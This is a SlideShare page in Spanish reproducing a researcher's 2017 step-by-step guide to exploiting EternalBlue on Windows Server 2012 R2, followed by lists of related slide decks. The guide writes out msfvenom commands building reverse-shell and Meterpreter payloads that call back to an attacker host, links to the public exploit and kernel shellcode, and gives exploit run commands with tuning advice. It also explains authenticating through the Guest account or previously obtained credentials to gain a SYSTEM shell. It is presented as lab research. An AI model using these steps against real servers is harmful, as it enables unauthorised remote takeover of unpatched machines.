SlideShare a Scribd company logo

Cómo explotar EternalBlue en Windows Server 2012 R2

Telefónica
Telefónica

Paper de Sheila A. Berta (@UnaPibaGeek) sobre cómo conseguir explotar con éxito EternalBlue en sistemas operativos Windows Server 2012 R2. Más información en el artículo http://www.elladodelmal.com/2017/07/como-explotar-eternalblue-en-windows.html

Technology
1 of 11
Download to read offline
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 1 EXPLOTAR ETERNALBLUE PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS SERVER 2012 R2 Sheila A. Berta (@UnaPibaGeek) – Security Researcher at Eleven Paths shey.x7@gmail.com || sheila.berta@11paths.com Junio 26, 2017
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 2 Tabla de contenidos EXPLOTAR ETERNALBLUE PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS SERVER 2012 R2 1 Introducción..................................................................................................................................................3 Entorno de laboratorio..............................................................................................................................3 Preparación de la shellcode..........................................................................................................................4 Ensamblar la kernel shellcode...................................................................................................................4 Generar la userland shellcode: payload con msfvenom............................................................................4 Concatenar kernel shellcode + userland shellcode ...................................................................................5 Obtención de una shell inversa.....................................................................................................................6 A través de una cuenta “Guest” ................................................................................................................6 A través de un usuario y contraseña válido...............................................................................................7 Obtención de una sesión de Meterpreter ....................................................................................................9 Palabras finales… ........................................................................................................................................11
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 3 Introducción Desde aquel leak de TheShadowBrokers el 14 de abril de 2017, el famoso exploit ETERNALBLUE ha estado bajo la observación de todos los que disfrutamos del reversing y la escritura de exploits. Fue así como en el transcurso de estos dos meses se han publicado varios documentos que intentan aclarar su funcionamiento. Metasploit, por su parte, ha incorporado a su arsenal de exploits la versión basada en el reversing de Sean Dillon y Dylan Davis, que permite impactar Windows 7 y Windows Server 2008 R2. Por otro lado, el investigador “Sleepya” ha publicado en su github una versión en Python de ETERNALBLUE, que da la posibilidad de atacar con éxito Windows Server 2012 R2. En vista de que no existe ninguna explicación de cómo utilizar el exploit de Sleepya y no he visto a nadie que lo mostrara funcionando, me decidí a investigar y escribir esta guía paso a paso una vez que lograra impactar con éxito el target. Por supuesto, esta documentación es con fines de investigación. Entorno de laboratorio Para montar el entorno de laboratorio, es necesario configurar los siguientes equipos: 1. Máquina víctima - Windows Server 2012 R2 Una máquina con Windows Server 2012 R2 de 64bits será utilizada como target. Luego de la instalación del sistema, no es necesario realizar cambios en el mismo, simplemente conocer su dirección IP y asegurarse de que esté encendido al realizar el ataque. 2. Máquina atacante – Preferentemente GNU/Linux Es posible utilizar cualquier sistema como máquina atacante, siempre y cuando se puedan ejecutar correctamente las siguientes herramientas: • NASM - http://www.nasm.us/ • Python v2.7 - https://www.python.org/download/releases/2.7/ • Metasploit Framework - https://github.com/rapid7/metasploit-framework A continuación, el resumen de las configuraciones en el laboratorio: • Windows Server 2012 R2 x64 – IP: 10.0.2.12  Target. • GNU/Linux Debian x64 – IP: 10.0.2.6  Atacante.
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 4 Preparación de la shellcode En primer lugar, es necesario ensamblar una kernel shellcode desarrollada para el exploit Eternablue. A la misma, le añadiremos al final la userland shellcode, la cual será el payload de Metasploit que deseemos ejecutar en el target una vez que se ha impactado. Ensamblar la kernel shellcode Desde el siguiente link es posible obtener la kernel shellcode desarrollada por Sleepya: https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file- eternalblue_x64_kshellcode-asm. Guardamos el archivo con extensión .asm y utilizamos NASM con el siguiente comando para el ensamblaje: nasm -f bin kernel_shell_x64.asm. Generar la userland shellcode: payload con msfvenom Utilizaremos msfvenom para la generación del payload. Con fines demostrativos, realizaremos dos ataques diferentes: uno nos permitirá obtener una shell inversa vía TCP y otro nos devolverá una sesión de meterpreter. Para ello, generaremos por separado ambos payloads de la siguiente manera: windows/x64/shell/reverse_tcp: msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[IP_ATACANTE] LPORT=4444
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 5 windows/x64/meterpreter/reverse_tcp: msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[IP_ATACANTE] LPORT=4444 Concatenar kernel shellcode + userland shellcode Una vez ensamblada la kernel shellcode y generados los payloads de Metasploit que deseamos, será necesario concatenarlos. Este paso no es más que realizar un “append” de una shellcode con la otra. kernel shellcode + shell/reverse_tcp: kernel shellcode + meterpreter/reverse_tcp: Terminados estos pasos, tenemos dos payloads de ataque diferentes listos para usar.
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 6 Obtención de una shell inversa Por supuesto, haremos uso del exploit de Sleepya que podemos obtenerlo desde el siguiente enlace: https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e y debemos guardarlo con extensión .py en la máquina atacante. Antes de proceder con el mismo, será necesario configurar Metasploit para que reciba la conexión inversa de la shellcode en el momento que sea ejecutada en el target. A continuación, veremos dos formas diferentes de lograr un impacto exitoso. A través de una cuenta “Guest” Por defecto, la cuenta Guest no viene activa en Windows Server 2012 R2. Sin embargo, si el administrador la ha activado, podremos aprovecharla y obtener una shell SYSTEM en el target. El primer paso es abrir el exploit.py con cualquier editor de texto e indicar que será esa cuenta la utilizada para autenticación. Como vemos en la imagen superior, en las líneas 42 y 43 podemos definir dicha información. Guardados los cambios, procedemos con la ejecución del exploit con los siguientes parámetros: python exploit.py <ip_target> reverse_shell.bin 500 El parámetro con valor “500” corresponde al “numGroomConn”. El ajustar la cantidad de conexiones “Groom” ayuda a alcanzar un pool de memoria contigua en el kernel para que la sobreescritura del buffer termine en la ubicación que deseamos y lograr ejecutar la shellcode correctamente. Para esta userland shellcode utilizaremos un número de conexiones Groom de 500. Si al impactar no recibimos la conexión inversa, podemos probar incrementando aún más este número.
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 7 Inmediatamente recibiremos la shell inversa en la terminal de Metasploit: A través de un usuario y contraseña válido Otra manera de lograr una explotación con éxito es utilizando credenciales válidas que hayamos obtenido previamente de un usuario del equipo. Al igual que en el caso del usuario Guest, no importan los privilegios de la cuenta que utilicemos para autenticar, la terminal que recibiremos siempre será de SYSTEM. Editamos nuevamente el exploit.py para añadir los datos de otra cuenta de usuario. Guardamos y ejecutamos el exploit de la misma forma que antes.
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 8 Obteniendo el mismo resultado.
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 9 Obtención de una sesión de Meterpreter Pasemos ahora a la demostración más deseada: obtener una sesión de meterpreter con privilegios de administrador. Antes que nada, será necesario configurar Metasploit para recibir la conexión inversa. Indicaremos al exploit que se autentique con Guest aunque, como ya se mostró previamente, es posible utilizar cualquier cuenta de usuario válida, no influirá en el resultado. Ejecutaremos el exploit utilizando los siguientes parámetros: python exploit.py <ip_target> meterpreter.bin 200 Observemos que en este caso reducimos las conexiones de Groom a 200. Si el exploit se ejecutara correctamente pero no recibimos la sesión, podemos probar ir incrementando este valor de a 50. Inmediatamente recibiremos la sesión de meterpreter en la terminal de Metasploit.
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 10
EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 11 Palabras finales… Finalmente, hemos obtenido una shell de Meterpreter con privilegios de administrador en Windows Server 2012 R2. Hace poco escribí estas mismas palabras en un paper ya publicado en exploit-db, pero refiriéndome a Windows 7 y Windows Server 2008 R2. Todo parece indicar que los análisis que realizamos en la comunidad de infosec están dando buenos resultados. Sin embargo, esto debe elevar el sentido de alerta el máximo, en quienes están a cargo de proteger infraestructuras informáticas. Agradecimientos: Worawit Wang (@sleepya_). Por aguantarme siempre: Claudio Caracciolo (@holesec). Mateo Martinez (@MateoMartinezOK). Luciano Martins (@clucianomartins). Arturo Busleiman (@buanzo). Ezequiel Sallis (@simubucks). Cristian Borghello (@crisborghe / @seguinfo). Sol O. (@0zz4n5). @DragonJar || @ekoparty || “Las Pibas de Infosec”. -- Sheila A. Berta - @UnaPibaGeek.

Recommended

Estructura repetitiva for y while
Estructura repetitiva for y whileEstructura repetitiva for y while
Estructura repetitiva for y while
J̶e̶s̶u̶s̶ B̶e̶r̶r̶o̶c̶a̶l̶
 
Índice del libro "Hacking Aplicaciones Web: SQL Injection"
Índice del libro "Hacking Aplicaciones Web: SQL Injection" Índice del libro "Hacking Aplicaciones Web: SQL Injection"
Índice del libro "Hacking Aplicaciones Web: SQL Injection"
Telefónica
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Telefónica
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
Efren Diaz Gomez
 
William fabricio manual de sistemas sas
William fabricio manual de sistemas sasWilliam fabricio manual de sistemas sas
William fabricio manual de sistemas sas
Rafael Toro
 
Entornos de desarrollo para symfony2 con vagrant y puppet
Entornos de desarrollo para symfony2 con vagrant y puppetEntornos de desarrollo para symfony2 con vagrant y puppet
Entornos de desarrollo para symfony2 con vagrant y puppet
Vicent Soria Durá
 
Practica 2 FTP
Practica 2 FTPPractica 2 FTP
Practica 2 FTP
Terrafx9
 
Workshop Técnicas Replicacion I
Workshop Técnicas Replicacion IWorkshop Técnicas Replicacion I
Workshop Técnicas Replicacion I
Lorenzo Jose Mota Garcia
 

Recommended

Estructura repetitiva for y while
Estructura repetitiva for y whileEstructura repetitiva for y while
Estructura repetitiva for y while
J̶e̶s̶u̶s̶ B̶e̶r̶r̶o̶c̶a̶l̶
 
Índice del libro "Hacking Aplicaciones Web: SQL Injection"
Índice del libro "Hacking Aplicaciones Web: SQL Injection" Índice del libro "Hacking Aplicaciones Web: SQL Injection"
Índice del libro "Hacking Aplicaciones Web: SQL Injection"
Telefónica
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Telefónica
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
Efren Diaz Gomez
 
William fabricio manual de sistemas sas
William fabricio manual de sistemas sasWilliam fabricio manual de sistemas sas
William fabricio manual de sistemas sas
Rafael Toro
 
Entornos de desarrollo para symfony2 con vagrant y puppet
Entornos de desarrollo para symfony2 con vagrant y puppetEntornos de desarrollo para symfony2 con vagrant y puppet
Entornos de desarrollo para symfony2 con vagrant y puppet
Vicent Soria Durá
 
Practica 2 FTP
Practica 2 FTPPractica 2 FTP
Practica 2 FTP
Terrafx9
 
Workshop Técnicas Replicacion I
Workshop Técnicas Replicacion IWorkshop Técnicas Replicacion I
Workshop Técnicas Replicacion I
Lorenzo Jose Mota Garcia
 
Configuraion vpn
Configuraion vpnConfiguraion vpn
Configuraion vpn
Jacqueline Coba
 
Configuracion vpn
Configuracion vpnConfiguracion vpn
Configuracion vpn
Jacqueline Coba
 
Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...
Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...
Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...
Julio Antonio Huaman Chuque
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Telefónica
 
Php01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linuxPhp01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linux
Julio Pari
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
Francesc Perez
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
darlyjazmin
 
Sistemas multi usu red_alfonso_contreras_final
Sistemas multi usu red_alfonso_contreras_finalSistemas multi usu red_alfonso_contreras_final
Sistemas multi usu red_alfonso_contreras_final
alfonso2014
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
Tensor
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphoneMeterpreter en android el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
JASENT
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
Johanna Mendez
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
Johanna Mendez
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Telefónica
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
David Vevelas
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
arbeycardona2
 
Integración LDAP + SAMBA
Integración LDAP + SAMBAIntegración LDAP + SAMBA
Integración LDAP + SAMBA
cyberleon95
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
Tensor
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
akencito
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
Tensor
 
Manual de instalacion servicios en red hat
Manual de instalacion servicios en red hatManual de instalacion servicios en red hat
Manual de instalacion servicios en red hat
jcausil1
 
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWordÍndice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Telefónica
 
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Telefónica
 

More Related Content

Similar to Cómo explotar EternalBlue en Windows Server 2012 R2

Php01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linuxPhp01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linux
Julio Pari
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
Francesc Perez
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphoneMeterpreter en android el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
JASENT
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
Johanna Mendez
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
Johanna Mendez
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
David Vevelas
 
Integración LDAP + SAMBA
Integración LDAP + SAMBAIntegración LDAP + SAMBA
Integración LDAP + SAMBA
cyberleon95
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
akencito
 

Similar to Cómo explotar EternalBlue en Windows Server 2012 R2 (20)

Configuraion vpn
Configuraion vpnConfiguraion vpn
Configuraion vpn
 
Configuracion vpn
Configuracion vpnConfiguracion vpn
Configuracion vpn
 
Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...
Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...
Replicación de Base de Datos en PostGreSQL 9.4 en Sistemas Operativos de Win...
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
 
Php01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linuxPhp01 instalacion de apache y php en linux
Php01 instalacion de apache y php en linux
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
Sistemas multi usu red_alfonso_contreras_final
Sistemas multi usu red_alfonso_contreras_finalSistemas multi usu red_alfonso_contreras_final
Sistemas multi usu red_alfonso_contreras_final
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphoneMeterpreter en android el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
 
Integración LDAP + SAMBA
Integración LDAP + SAMBAIntegración LDAP + SAMBA
Integración LDAP + SAMBA
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Manual de instalacion servicios en red hat
Manual de instalacion servicios en red hatManual de instalacion servicios en red hat
Manual de instalacion servicios en red hat
 

More from Telefónica

Los retos sociales y éticos del Metaverso
Los retos sociales y éticos del MetaversoLos retos sociales y éticos del Metaverso
Los retos sociales y éticos del Metaverso
Telefónica
 

More from Telefónica (20)

Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWordÍndice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
Índice de libro "Historias Cortas sobre Fondo Azul" de Willy en 0xWord
 
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
Índice del libro: Máxima Seguridad en Windows: Secretos Técnicos. 6ª Edición ...
 
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWordÍndice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
Índice del libro "Hacking Web3: Challenge Acepted!" de 0xWord
 
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
Índice del libro "Amazon Web Services: Hardening de Infraestructuras Cloud Co...
 
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
Índice del Libro "Ciberestafas: La historia de nunca acabar" (2ª Edición) de ...
 
Índice del Libro "Storytelling para Emprendedores"
Índice del Libro "Storytelling para Emprendedores"Índice del Libro "Storytelling para Emprendedores"
Índice del Libro "Storytelling para Emprendedores"
 
Digital Latches for Hacker & Developer
Digital Latches for Hacker & DeveloperDigital Latches for Hacker & Developer
Digital Latches for Hacker & Developer
 
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
Índice del libro "Hardening de servidores GNU / Linux 5ª Edición (Gold Edition)"
 
WhatsApp INT: OSINT en WhatsApp
WhatsApp INT: OSINT en WhatsAppWhatsApp INT: OSINT en WhatsApp
WhatsApp INT: OSINT en WhatsApp
 
Índice del libro "De la Caverna al Metaverso" de 0xWord.com
Índice del libro "De la Caverna al Metaverso" de 0xWord.comÍndice del libro "De la Caverna al Metaverso" de 0xWord.com
Índice del libro "De la Caverna al Metaverso" de 0xWord.com
 
20º Máster Universitario de Ciberseguridad UNIR
20º Máster Universitario de Ciberseguridad UNIR20º Máster Universitario de Ciberseguridad UNIR
20º Máster Universitario de Ciberseguridad UNIR
 
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs AcademyBootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
BootCamp Online en DevOps (and SecDevOps) de GeeksHubs Academy
 
Índice del libro "Ciberseguridad de tú a tú" de 0xWord
Índice del libro "Ciberseguridad de tú a tú" de 0xWordÍndice del libro "Ciberseguridad de tú a tú" de 0xWord
Índice del libro "Ciberseguridad de tú a tú" de 0xWord
 
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
Índice del libro "Open Source INTelligence (OSINT): Investigar personas e Ide...
 
Índice del libro "Social Hunters" de 0xWord
Índice del libro "Social Hunters" de 0xWordÍndice del libro "Social Hunters" de 0xWord
Índice del libro "Social Hunters" de 0xWord
 
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
Índice del libro "Kubernetes para profesionales: Desde cero al despliegue de ...
 
Los retos sociales y éticos del Metaverso
Los retos sociales y éticos del MetaversoLos retos sociales y éticos del Metaverso
Los retos sociales y éticos del Metaverso
 
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWordÍndice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
Índice del Libro "Ciberestafas: La historia de nunca acabar" de 0xWord
 
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWordÍndice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
Índice del libro "Docker: SecDevOps" 2ª Edición de 0xWord
 
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
Índice del libro "Malware moderno: Técnicas avanzadas y su influencia en la i...
 

Recently uploaded

Modulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdfModulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdf
AnnimoUno1
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
JohnRamos830530
 

Recently uploaded (11)

Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
Modulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdfModulo-Mini Cargador.................pdf
Modulo-Mini Cargador.................pdf
 
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptxEL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
 
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdfRefrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
Refrigerador_Inverter_Samsung_Curso_y_Manual_de_Servicio_Español.pdf
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 

Cómo explotar EternalBlue en Windows Server 2012 R2

  • 1. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 1 EXPLOTAR ETERNALBLUE PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS SERVER 2012 R2 Sheila A. Berta (@UnaPibaGeek) – Security Researcher at Eleven Paths shey.x7@gmail.com || sheila.berta@11paths.com Junio 26, 2017
  • 2. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 2 Tabla de contenidos EXPLOTAR ETERNALBLUE PARA OBTENER UNA SHELL DE METERPRETER EN WINDOWS SERVER 2012 R2 1 Introducción..................................................................................................................................................3 Entorno de laboratorio..............................................................................................................................3 Preparación de la shellcode..........................................................................................................................4 Ensamblar la kernel shellcode...................................................................................................................4 Generar la userland shellcode: payload con msfvenom............................................................................4 Concatenar kernel shellcode + userland shellcode ...................................................................................5 Obtención de una shell inversa.....................................................................................................................6 A través de una cuenta “Guest” ................................................................................................................6 A través de un usuario y contraseña válido...............................................................................................7 Obtención de una sesión de Meterpreter ....................................................................................................9 Palabras finales… ........................................................................................................................................11
  • 3. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 3 Introducción Desde aquel leak de TheShadowBrokers el 14 de abril de 2017, el famoso exploit ETERNALBLUE ha estado bajo la observación de todos los que disfrutamos del reversing y la escritura de exploits. Fue así como en el transcurso de estos dos meses se han publicado varios documentos que intentan aclarar su funcionamiento. Metasploit, por su parte, ha incorporado a su arsenal de exploits la versión basada en el reversing de Sean Dillon y Dylan Davis, que permite impactar Windows 7 y Windows Server 2008 R2. Por otro lado, el investigador “Sleepya” ha publicado en su github una versión en Python de ETERNALBLUE, que da la posibilidad de atacar con éxito Windows Server 2012 R2. En vista de que no existe ninguna explicación de cómo utilizar el exploit de Sleepya y no he visto a nadie que lo mostrara funcionando, me decidí a investigar y escribir esta guía paso a paso una vez que lograra impactar con éxito el target. Por supuesto, esta documentación es con fines de investigación. Entorno de laboratorio Para montar el entorno de laboratorio, es necesario configurar los siguientes equipos: 1. Máquina víctima - Windows Server 2012 R2 Una máquina con Windows Server 2012 R2 de 64bits será utilizada como target. Luego de la instalación del sistema, no es necesario realizar cambios en el mismo, simplemente conocer su dirección IP y asegurarse de que esté encendido al realizar el ataque. 2. Máquina atacante – Preferentemente GNU/Linux Es posible utilizar cualquier sistema como máquina atacante, siempre y cuando se puedan ejecutar correctamente las siguientes herramientas: • NASM - http://www.nasm.us/ • Python v2.7 - https://www.python.org/download/releases/2.7/ • Metasploit Framework - https://github.com/rapid7/metasploit-framework A continuación, el resumen de las configuraciones en el laboratorio: • Windows Server 2012 R2 x64 – IP: 10.0.2.12  Target. • GNU/Linux Debian x64 – IP: 